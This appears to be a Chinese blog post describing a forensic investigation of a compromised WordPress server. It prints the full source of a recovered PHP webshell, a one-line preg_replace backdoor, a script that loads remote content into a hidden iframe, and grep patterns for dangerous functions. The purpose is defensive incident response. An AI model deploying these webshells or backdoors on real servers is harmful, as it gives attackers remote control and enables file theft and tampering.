• [织梦吧]唯一域名:www.dedecms8.com,织梦DedeCMS学习平台.

当前位置: > 站长学院 > 站长百科 >

惨遭黑客入侵,记一次服务器被攻击的应急行动!

来源: www.dedecms8.com 编辑:织梦吧 时间:2017-10-23点击:

 如果你的 PHP 服务器被黑客入侵时该怎么办?这是我最近处理 Linux Web 服务器发现的一个问题。

640.jpg

PHP 服务器被黑时,会出现新的 PHP 文件,这与运行在服务器上的 wordpress 应用程序和特定的用户代理没有任何关系,所有的流量都被重定向到另一个站点。

在第一次被攻击之后,我已经禁用了所有他所检测到的恶意文件,并修复了重定向,直到服务器再次被黑客攻击。

为此,要将这些应用程序转移到新的设备进行分析,我必须在原系统上对下列 3 个线索进行取证:

  • 应用仍然在运行。

  • 应用至少被黑过两次。

  • 应用已经被管理员大量修改过了。

不过要说明的是,我的目的不是要建立一个合法有效的保护机制,而是要确定:

  • 确定系统是否被破坏,如果被破坏,则删除或屏蔽与此相关的所有内容。

  • 检测哪些文件被修改以避免将受感染的文件转移到新的主机。

  • 理想情况下,初始攻击向量被阻止。

在获得域名、IP 和 SSH 证书后,我就开始收集被黑的证据了。

收集证据

在连接到服务器之前,我注意到我的 IP,以确保以后能够在日志中把它区分开。

然后通过 SFTP 连接,由于服务器的磁盘安装和运行,我无法进行映像。所以我下载了所有我可以得到的日志文件以及其他感兴趣的文件。

我复制了整个 /var/log/ 目录,并从虚拟主机根文档所在的目录中复制了 Apache 特定的日志文件,并复制了被黑的 PHP 应用程序,以及在事件发生后不久的一些备份。

不幸的是,我没有对管理员所做的更改进行备份,因此一些关键的文件可能已经被修改了。

我启动了 Kali 并运行了一个具有 portscan 端口扫描器程序的 Nmap 扫描,另外我还安装 WPScan。

因为服务器运行的是一个旧的 Wordpress 实例,而且这个实例也执行了重定向,所以 Wordpress 看起来很可能是攻击的初始点。

Wordpress 在受到黑客攻击后已经更新,WPScan 没有发现任何当前的漏洞。portscan 为 FTP、SSH、HTTP 和 HTTPS 提供了开放端口,而这在 Web 服务器上是不可能的。

我在 wp - content 目录下发现了所有的 Shell,在某种程度上,这意味着 Wordpress 应用程序已经被破坏。

我还检查了 VirusTotal,看看网站是否传播了恶意软件,但一切似乎都很正常。

于是我决定通过控制台登录系统,但前提是我不知道服务器上的二进制文件是否被感染了,因此为了减少取证的影响,我带来了我自己的静态链接二进制文件。

我从 busybox 下载了二进制 coreutil,并将它们上传到了服务器上。我还通过 SLEUTH Kit 上传了 chkrootkit 和一个叫做 mac-robber 的工具。

我使用静态二进制文件来检查系统,得到一个运行流程列表,cronjob……

netstat -tulpen

为了得到一个监控列表(tcp 和 udp)进程,我没有涵盖 portscan 中的所有端口,因此这里的输出可能很有趣。

netstat -taupn

从服务器显示活动的传出连接(tcp 和 udp),然而,这两个清单都没有显示可疑的活动。

对 chkrootkit 进行 rootkit 检测,也没有找到任何东西。rkhunter 和 clamav 也没有产生任何异常。ClamAV(Linux 杀毒软件)也没有检测到 PHP Shell 和 Windows 木马程序。

虽然我很努力,但到目前为止还没有发现异常打开的端口,异常的进程运行。于是,我和一个管理员核实了 FTP 和 ssh 帐号,这些账号看起来也很正常。

但我并没有放弃,在使用了 mac-robber 工具后,我收集了在服务器上创建和修改的文件信息(稍后可以用来创建事件的时间轴):

./mac-robber / > /root/forensics/timeline.txt

截至目前,我收集的证据包括:

  • 关于在服务器上何时创建了哪些文件的信息。

  • 各种日志文件,其中包括 Apache 日志。

  • 受损网站的源代码和一些修改的 Shell。

  • 在第一次和第二次攻击之间备份的信息。

分析证据

由于已经发现了攻击者放置的一些 Web Shell,在经过分析后,我认为,这些文件很像 Xjrop.php、Nwfqx.php 或 Rwchn7.php,并且很可能驻留在常规应用程序文件。

然而,也有一个 up.php 文件被调用,它提供了一个相似的目的,但有其他的源代码。而 Xjrop.php,Nwfqx.php 和 Rwchn7.php 是一样的,up.php 是另一种具有略微不同功能的 Shell。用 diff 命令,比较文件:

diff Xjrop.php Nwfqx.php

或者通过他们的 md5sum 进行比较:

md5sum Xjrop.php

md5sum Nwfqx.php

还有 2 个文件 bjrnpf.php 和 jemkwl.php,这些都是相同的,但不同于其他文件。一个可疑的可执行文件被命名为 windoze,我怀疑是一些恶意软件从这个主机分发的。

我构建了这个文件的 md5sum,并检查了 VirusTotal 的哈希值,注意,在 VirusTotal 上上传的文件可以被其他研究人员看到,因此是公开的。VirusTotal 认为这个文件是木马,为了以后的分析,我保存了它。

一些 PHP Shell 的代码,如下所示:

  1. <?php

  2. set_time_limit(0);

  3. error_reporting(0);

  4. if(get_magic_quotes_gpc()){

  5.    foreach($_POST as $key=>$value){

  6.        $_POST[$key] = stripslashes($value);

  7.    }

  8. }

  9. echo '<!DOCTYPE HTML>

  10. <HTML>

  11. <HEAD>

  12. <link href="" rel="stylesheet" type="text/css">

  13. <title>404-server!!</title>

  14. <style>

  15. body{

  16.    font-family: "Racing Sans One", cursive;

  17.    background-color: #e6e6e6;

  18.    text-shadow:0px 0px 1px #757575;

  19. }

  20. #content tr:hover{

  21.    background-color: #636263;

  22.    text-shadow:0px 0px 10px #fff;

  23. }

  24. #content .first{

  25.    background-color: silver;

  26. }

  27. #content .first:hover{

  28.    background-color: silver;

  29.    text-shadow:0px 0px 1px #757575;

  30. }

  31. table{

  32.    border: 1px #000000 dotted;

  33. }

  34. H1{

  35.    font-family: "Rye", cursive;

  36. }

  37. a{

  38.    color: #000;

  39.    text-decoration: none;

  40. }

  41. a:hover{

  42.    color: #fff;

  43.    text-shadow:0px 0px 10px #ffffff;

  44. }

  45. input,select,textarea{

  46.    border: 1px #000000 solid;

  47.    -moz-border-radius: 5px;

  48.    -webkit-border-radius:5px;

  49.    border-radius:5px;

  50. }

  51. </style>

  52. </HEAD>

  53. <BODY>

  54. <H1><center>config root man</center></H1>

  55. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">

  56. <tr><td>Current Path : ';

  57. if(isset($_GET['path'])){

  58.    $path = $_GET['path'];  

  59. }else{

  60.    $path = getcwd();

  61. }

  62. $path = str_replace('','/',$path);

  63. $paths = explode('/',$path);

  64. foreach($paths as $id=>$pat){

  65.    if($pat == '' && $id == 0){

  66.        $a = true;

  67.        echo '<a href="?path=/">/</a>';

  68.        continue;

  69.    }

  70.    if($pat == '') continue;

  71.    echo '<a href="?path=';

  72.    for($i=0;$i<=$id;$i++){

  73.        echo "$paths[$i]";

  74.        if($i != $id) echo "/";

  75.    }

  76.    echo '">'.$pat.'</a>/';

  77. }

  78. echo '</td></tr><tr><td>';

  79. if(isset($_FILES['file'])){

  80.    if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){

  81.        echo '<font color="green">File Upload Done.</font><br />';

  82.    }else{

  83.        echo '<font color="red">File Upload Error.</font><br />';

  84.    }

  85. }

  86. echo '<b><br>'.php_uname().'<br></b>';

  87. echo '<form enctype="multipart/form-data" method="POST">

  88. Upload File : <input type="file" name="file" />

  89. <input type="submit" value="upload" />

  90. </form>

  91. </td></tr>';

  92. if(isset($_GET['filesrc'])){

  93.    echo "<tr><td>Current File : ";

  94.    echo $_GET['filesrc'];

  95.    echo '</tr></td></table><br />';

  96.    echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');

  97. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){

  98.    echo '</table><br /><center>'.$_POST['path'].'<br /><br />';

  99.    if($_POST['opt'] == 'chmod'){

  100.        if(isset($_POST['perm'])){

  101.            if(chmod($_POST['path'],$_POST['perm'])){

  102.                echo '<font color="green">Change Permission Done.</font><br />';

  103.            }else{

  104.                echo '<font color="red">Change Permission Error.</font><br />';

  105.            }

  106.        }

  107.        echo '<form method="POST">

  108.        Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />

  109.        <input type="hidden" name="path" value="'.$_POST['path'].'">

  110.        <input type="hidden" name="opt" value="chmod">

  111.        <input type="submit" value="Go" />

  112.        </form>';

  113.    }elseif($_POST['opt'] == 'rename'){

  114.        if(isset($_POST['newname'])){

  115.            if(rename($_POST['path'],$path.'/'.$_POST['newname'])){

  116.                echo '<font color="green">Change Name Done.</font><br />';

  117.            }else{

  118.                echo '<font color="red">Change Name Error.</font><br />';

  119.            }

  120.            $_POST['name'] = $_POST['newname'];

  121.        }

  122.        echo '<form method="POST">

  123.        New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />

  124.        <input type="hidden" name="path" value="'.$_POST['path'].'">

  125.        <input type="hidden" name="opt" value="rename">

  126.        <input type="submit" value="Go" />

  127.        </form>';

  128.    }elseif($_POST['opt'] == 'edit'){

  129.        if(isset($_POST['src'])){

  130.            $fp = fopen($_POST['path'],'w');

  131.            if(fwrite($fp,$_POST['src'])){

  132.                echo '<font color="green">Edit File Done.</font><br />';

  133.            }else{

  134.                echo '<font color="red">Edit File Error.</font><br />';

  135.            }

  136.            fclose($fp);

  137.        }

  138.        echo '<form method="POST">

  139.        <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />

  140.        <input type="hidden" name="path" value="'.$_POST['path'].'">

  141.        <input type="hidden" name="opt" value="edit">

  142.        <input type="submit" value="Go" />

  143.        </form>';

  144.    }

  145.    echo '</center>';

  146. }else{

  147.    echo '</table><br /><center>';

  148.    if(isset($_GET['option']) && $_POST['opt'] == 'delete'){

  149.        if($_POST['type'] == 'dir'){

  150.            if(rmdir($_POST['path'])){

  151.                echo '<font color="green">Delete Dir Done.</font><br />';

  152.            }else{

  153.                echo '<font color="red">Delete Dir Error.</font><br />';

  154.            }

  155.        }elseif($_POST['type'] == 'file'){

  156.            if(unlink($_POST['path'])){

  157.                echo '<font color="green">Delete File Done.</font><br />';

  158.            }else{

  159.                echo '<font color="red">Delete File Error.</font><br />';

  160.            }

  161.        }

  162.    }

  163.    echo '</center>';

  164.    $scandir = scandir($path);

  165.    echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">

  166.    <tr class="first">

  167.        <td><center>Name</center></td>

  168.        <td><center>Size</center></td>

  169.        <td><center>Permissions</center></td>

  170.        <td><center>Options</center></td>

  171.    </tr>';

  172.    foreach($scandir as $dir){

  173.        if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;

  174.        echo "<tr>

  175.        <td><a href="?path=$path/$dir">$dir</a></td>

  176.        <td><center>--</center></td>

  177.        <td><center>";

  178.        if(is_writable("$path/$dir")) echo '<font color="green">';

  179.        elseif(!is_readable("$path/$dir")) echo '<font color="red">';

  180.        echo perms("$path/$dir");

  181.        if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';

  182.  

  183.        echo "</center></td>

  184.        <td><center><form method="POST" action="?option&path=$path">

  185.        <select name="opt">

  186.    <option value=""></option>

  187.        <option value="delete">Delete</option>

  188.        <option value="chmod">Chmod</option>

  189.        <option value="rename">Rename</option>

  190.        </select>

  191.        <input type="hidden" name="type" value="dir">

  192.        <input type="hidden" name="name" value="$dir">

  193.        <input type="hidden" name="path" value="$path/$dir">

  194.        <input type="submit" value=">" />

  195.        </form></center></td>

  196.        </tr>";

  197.    }

  198.    echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';

  199.    foreach($scandir as $file){

  200.        if(!is_file("$path/$file")) continue;

  201.        $size = filesize("$path/$file")/1024;

  202.        $size = round($size,3);

  203.        if($size >= 1024){

  204.            $size = round($size/1024,2).' MB';

  205.        }else{

  206.            $size = $size.' KB';

  207.        }

  208.        echo "<tr>

  209.        <td><a href="?filesrc=$path/$file&path=$path">$file</a></td>

  210.        <td><center>".$size."</center></td>

  211.        <td><center>";

  212.        if(is_writable("$path/$file")) echo '<font color="green">';

  213.        elseif(!is_readable("$path/$file")) echo '<font color="red">';

  214.        echo perms("$path/$file");

  215.        if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';

  216.        echo "</center></td>

  217.        <td><center><form method="POST" action="?option&path=$path">

  218.        <select name="opt">

  219.    <option value=""></option>

  220.        <option value="delete">Delete</option>

  221.        <option value="chmod">Chmod</option>

  222.        <option value="rename">Rename</option>

  223.        <option value="edit">Edit</option>

  224.        </select>

  225.        <input type="hidden" name="type" value="file">

  226.        <input type="hidden" name="name" value="$file">

  227.        <input type="hidden" name="path" value="$path/$file">

  228.        <input type="submit" value=">" />

  229.        </form></center></td>

  230.        </tr>";

  231.    }

  232.    echo '</table>

  233.    </div>';

  234. }

  235. echo '<br />Man Man <br />

  236. </BODY>

  237. </HTML>';

  238. function perms($file){

  239.    $perms = fileperms($file);

  240. if (($perms & 0xC000) == 0xC000) {

  241.    // Socket

  242.    $info = 's';

  243. } elseif (($perms & 0xA000) == 0xA000) {

  244.    // Symbolic Link

  245.    $info = 'l';

  246. } elseif (($perms & 0x8000) == 0x8000) {

  247.    // Regular

  248.    $info = '-';

  249. } elseif (($perms & 0x6000) == 0x6000) {

  250.    // Block special

  251.    $info = 'b';

  252. } elseif (($perms & 0x4000) == 0x4000) {

  253.    // Directory

  254.    $info = 'd';

  255. } elseif (($perms & 0x2000) == 0x2000) {

  256.    // Character special

  257.    $info = 'c';

  258. } elseif (($perms & 0x1000) == 0x1000) {

  259.    // FIFO pipe

  260.    $info = 'p';

  261. } else {

  262.    // Unknown

  263.    $info = 'u';

  264. }

  265. // Owner

  266. $info .= (($perms & 0x0100) ? 'r' : '-');

  267. $info .= (($perms & 0x0080) ? 'w' : '-');

  268. $info .= (($perms & 0x0040) ?

  269.            (($perms & 0x0800) ? 's' : 'x' ) :

  270.            (($perms & 0x0800) ? 'S' : '-'));

  271. // Group

  272. $info .= (($perms & 0x0020) ? 'r' : '-');

  273. $info .= (($perms & 0x0010) ? 'w' : '-');

  274. $info .= (($perms & 0x0008) ?

  275.            (($perms & 0x0400) ? 's' : 'x' ) :

  276.            (($perms & 0x0400) ? 'S' : '-'));

  277. // World

  278. $info .= (($perms & 0x0004) ? 'r' : '-');

  279. $info .= (($perms & 0x0002) ? 'w' : '-');

  280. $info .= (($perms & 0x0001) ?

  281.            (($perms & 0x0200) ? 't' : 'x' ) :

  282.            (($perms & 0x0200) ? 'T' : '-'));

  283.    return $info;

  284. }

  285. ?>

  286. 你可能注意到了“404-server! !”的标题,利用谷歌搜索的结果可能是其他受感染的服务器:

    640.jpg

    有更多可疑的文件包含了看似无用的代码:

    <?php @preg_replace("/[pageerror]/e",$_POST['mkf3wapa'],"saft"); ?>

    这行替换了字符串“saft”中的一个小写字母“saft”中的每一个匹配,并使用 $ _POST 变量 mkf3wapa 的内容。返回值被忽略,因此我不确定该代码片段的用法应该是什么。

    然而,谷歌搜索结果显示,这段代码与 404-server 有关联! !上传 Shell 并出现在相同的受损服务器上。因此,如果你在服务器上发现了这个代码,它可能是一个被攻击的标识,你应该进一步检查。

    212.jpg

    检查“404-Server!!”源代码使我得出结论,黑客提供了一个文件浏览器,它具有上传、查看和删除文件以及调整权限的功能。

    通过检查这些文件的背后组织和开发者,我发现它们都是由PHP进程的所有者创建的,因此它们非常像 PHP 应用程序所创建的。

    另一个被攻击的文件叫做 way.php,它只是包含了来自另一个服务器的文件:

    1. <?php

    2. $way = 'http://XXX.XXX.XXX.XXX/dir/index.php?52b019b=l3SKfPrfJxjFGMeDebmtF_FXPAzaHkyZxYufiaWSHJmkaWD8jvT5Sknh_QTIT1XW_r4';

    3. $fd = @file($way);

    4. if ($fd !== false)

    5. if (isset($fd[0]))

    6. echo(' <iframe src="'.$fd[0].'" width="1" height="1" ></iframe> ');

    7. ?>

    因此,这基本上是一种将外国 html / javascript 代码包含在该域下的方法。然而,恶意服务器向我展示了一个有趣的信息:

    这可能是因为我没有使用正确的引用头,或者服务器不再为其恶意负载服务。

    在一个 html 文件中,我发现:

    <iframe src="way.php"></iframe>

    它只是用 iframe 方法插入了 way.php 的输出。

    进一步寻找 Shell

    以上这些文件因为它们异常的文件名被识别后,我开始通过应用程序代码来查找更多可疑的文件。特别是,你可能希望查找在服务器上执行命令的函数,例如:

    passthzru

    exec

    shell_exec

    eval

    system

    并 grep 所有这些函数的文件:

    egrep -rin "system|passthru|exec|shell_exec|eval" /var/www/vhosts/xyz/  > 

    ~/forensics/results_shell_grep.txt

    你经常看到人们只 grep*.php 文件,但这可能会遗漏很多信息,PHP 文件可以有其他扩展,当只检查 *.php 扩展时,就可能会忽略*.php5*, *.php4 或*.phps。

    因此,如果条件允许,你最好能在所有文件中进行 grep,或者在任何其他文件结束时提前搜索。也可能存在带有任意扩展的恶意文件,这些文件由更常规的 PHP 文件加载,因此你也应该尝试检测这些文件。

    但是,请注意,由于这些文件没有直接执行代码,因此不会检测到混淆的文件和上传的 Shell。你可能需要扩展你的搜索范围,减少一些可疑的函数。

    fputs

    fwrite

    fopen (especially with URLs)

    chmod

    socket_*

    curl_*

    base64_decode

    gzinflate

    如果你有一个粗略的想法,当攻击发生的时候,你可能也想要寻找在那个日期之后被创建或修改的文件。

    find -mtime -2 /directory

    根据在服务器文件上发生的常规更改,你可以很容易地以这种方式检测到更多的 Shell。

    如果你已经发现了一些恶意文件,那么还可以使用检测到的文件的某些特性来寻找进一步的变体,比如,检查所有文件的字符串“404-Server!!”。

    除了传统的杀毒软件扫描仪外,还有一种方法是使用基于 yara 的扫描仪,比如 OWASP 中的 Web Malware Scanner。

    这些基本上是扫描文件,并以检测恶意代码的 yara 规则检查它们。为此,你需要在 git 中安装 yara、Python binding 和 Web Malware Scanner。

    在我的例子中,运行 webmalewarescanner,可以在被破坏的 PHP 应用程序的源代码上产生了很多结果,我花了一些时间,但也正确地识别了三种类型的 Web Shell 中的两种。

    root@DESKTOP-XXX:~# cat webmalwarescan_results.txt |grep "webshell"

    [2017-08-01 09:24:56] Scan result for file /path/to/up.php : webshell iMHaPFtp 2

    [...]

    此外,还有一些 wordpress 插件试图检测出攻击方案,比如 sucuri。我不想在已经损坏的系统上安装额外的插件,所以我没有尝试这个。

    根据我的经验,在寻找 Web Shell 时,你应该始终结合不同的技术。有些文件很难识别,乍看上去合法的文件也可能有恶意的功能。你越了解被破坏的系统,就越容易检测到异常文件。

  287. 禁用攻击文件

    收集完所有这些信息后,不要忘记将恶意文件渲染成无用的。我已经删除了所有用户的阅读和执行权限,但在系统运行了一段时间后,我将删除它们。系统中不应该留下任何损坏的文件,以防有人不小心将它们重新激活。

    建立一个攻击时间表

    在前面提到的 mac-robber 工具之前,我已经检索了文件信息,我用 mactime 创建了这个信息的时间轴。

    mactime -b timeline.txt 2017-06-01 > timeline_output.txt

    然后,你会得到一长串类似下面的条目:

    Fri Jun 30 2017 15:43:02      308 .a.. -rw-r--r-- 10000    1004     0        /var/www/vhosts/xyz/httpdocs/way.php

    Fri Jun 30 2017 15:51:55      308 m.c. -rw-r--r-- 10000    1004     0        /var/www/vhosts/xyz/httpdocs/way.php

    Fri Jun 30 2017 16:07:47       31 m.c. -rw-r--r-- 10000    1004     0        /var/www/vhosts/xyz/httpdocs/newmessage.html

    这是服务器上所有文件的非常有用的列表,包括所有者 id、组 id 以及文件修改、访问和更改的时间戳。

    请注意,在 Unix 上,通常会获得文件访问时间、文件更改时间和文件修改时间(atime,ctime,mtime)。

    这些是在文件大小之后的 mactime 时间线文件中显示的,例如上面示例中的第二行中的 m.c.,这意味着给定的日期会显示文件修改和更改时间。

    在访问文件时设置 a(atime);c(ctime)是在文件内容或权限发生更改时设置的;当文件内容发生了变化,而不是所有者或权限更改时,设置 m;在创建文件时,设置 b。

    因此,mtime 在文件最后写入时向我显示。但是我不能确定它是否与文件创建日期相匹配。

    不幸的是,这里无法重新构造,因此我不能确定这是上传的时间,但是我可以确定,在周五,Jul 07 文件已经在系统上了。在 Linux 上,你可以使用工具 stat 来显示单个文件的这些信息。

    还有一些与文件系统,文件访问,创建时间有关的副标题。首先,如果你的文件系统安装了 noatime 选项(你可以通过运行 mount 命令来解决这个问题),则不需要编写访问时间。虽然这能增加取证速度,但显然非常复杂。

    然而,好消息是,根据你的文件系统,你可能能够找到文件创建时间。Ext4 支持它,它在当前的 Linux 服务器上很常见。

    但是没有一个用户工具可以很容易地显示文件创建时间,而 mactime 也没有捕捉到它。但是,使用 debugfs 可以检索创建日期。为此,Igor Moiseev 编写了一个名为 xstat 的便捷小脚本。

    检查我的时间线,我可以知道第一个恶意的 Shell 何时出现在系统上。

    检查日志

    我可以在日志中找到一些对这些工具的调用,主要是来自亚洲 IP 地址,但由于 POST 数据没有被记录,我无法找到从 Apache 日志中上传这些 Shell 的文件。

    寻找初始攻击向量

    为了确定我是否能识别出最初的攻击,我使用了 Apache-Scalp。这是一个较旧的工具,但仍然有效。它主要通过正则表达式匹配已知攻击向量的 Apache 日志文件。

    /opt/apache-scalp/scalp# python scalp.py -l 

    /path/to/logs/access_log.processed.1_plain -f /path/to/default_filter.xml -a 

    lfi,rfi,sqli,dt -p "25/Jun/2017;05/Jul/2017" --output /root/scalp --html

    然而,在事件发生当天或之前,没有可疑的 sql 注入或 lfi / rfi 活动,这可能会与其中一个可疑文件发生关系。

    检查 wordpress 插件,我发现在漏洞被上传一个月前,至少有一个 SEO 插件安装了一个严重的 Shell。

    由于安装了很多插件,所以我编写了一个小脚本,来检查 wordpress 插件目录对 wpvulndb.com 的访问,并显示所有的漏洞。事实证明,有很多严重的漏洞,在没有足够的日志信息的情况下,很难追踪最初的向量。

    [+] w3-total-cache

         * [UNKNOWN] W3 Total Cache 0.9.2.4 - Username & Hash Extract

            Fixed in: 0.9.2.5

            + http://seclists.org/fulldisclosure/2012/Dec/242

            + https://github.com/FireFart/W3TotalCacheExploit

         * [RCE] W3 Total Cache - Remote Code Execution

            Fixed in: 0.9.2.9

            + http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/

            + http://wordpress.org/support/topic/pwn3d

            + http://blog.sucuri.net/2013/04/update-wp-super-cache-and-w3tc-immediately-remote-code-execution-vulnerability-disclosed.html

         * [CSRF] W3 Total Cache 0.9.4 - Edge Mode Enabling CSRF

            Fixed in: 0.9.4.1

            + http://seclists.org/fulldisclosure/2014/Sep/29

         * [CSRF] W3 Total Cache <= 0.9.4 - Cross-Site Request Forgery (CSRF)

            Fixed in: 0.9.4.1

    注意,脚本没有检查主题或 wordpress 核心漏洞,这也可能包含严重的漏洞。

    总结

    根据这次服务器被攻击,我总结了如下几条:

     
    • 该系统已经被破坏了几个星期。在 Apache 日志的 Shell 中,最早的可见访问是在 7 月初。

    • 我识别了各种受损的 PHP 文件和一个 Windows 恶意软件。

    • 至少有三种类型的 Shell 被发现是攻击的指标。

    • Windows 恶意软件可能还没有传播。

    • 服务器没有显示出明显的更深的感染迹象,从用户帐户来看,没有找到 rootkit。

    • 攻击可能被限制在 Web Server 用户上,对于其他用户,我还没有发现任何受攻击的迹象。

    • 最初的攻击可能是过时的 wordpress 系统中最不安全的漏洞之一。

    • 没有迹象表明其他用户通过 Shell 访问了数据库或数据库凭据。但是,我不能排除有可能访问数据库的可能性。

    • 一些可能是来自亚洲 IPs 的恶意活动(Shell 访问)。

    • 除了清理系统中的恶意文件,我也应用一些优化手段,比如更改密码和证书,安装一个主机 id,执行定期扫描,主动监测服务器……

      不过,你永远不会得到 100% 的安全性,特别是当你的服务器已经被破坏时,你所能做的最好的事情就是检查每一个来自非官方的备份或脚本。

标签:

About D8

  • ©2014 织梦吧(d8) DedeCMS学习交流平台
  • 唯一网址 www.DedeCMS8.com 网站地图
  • 联系我们 1170734538@qq.com ,  QQ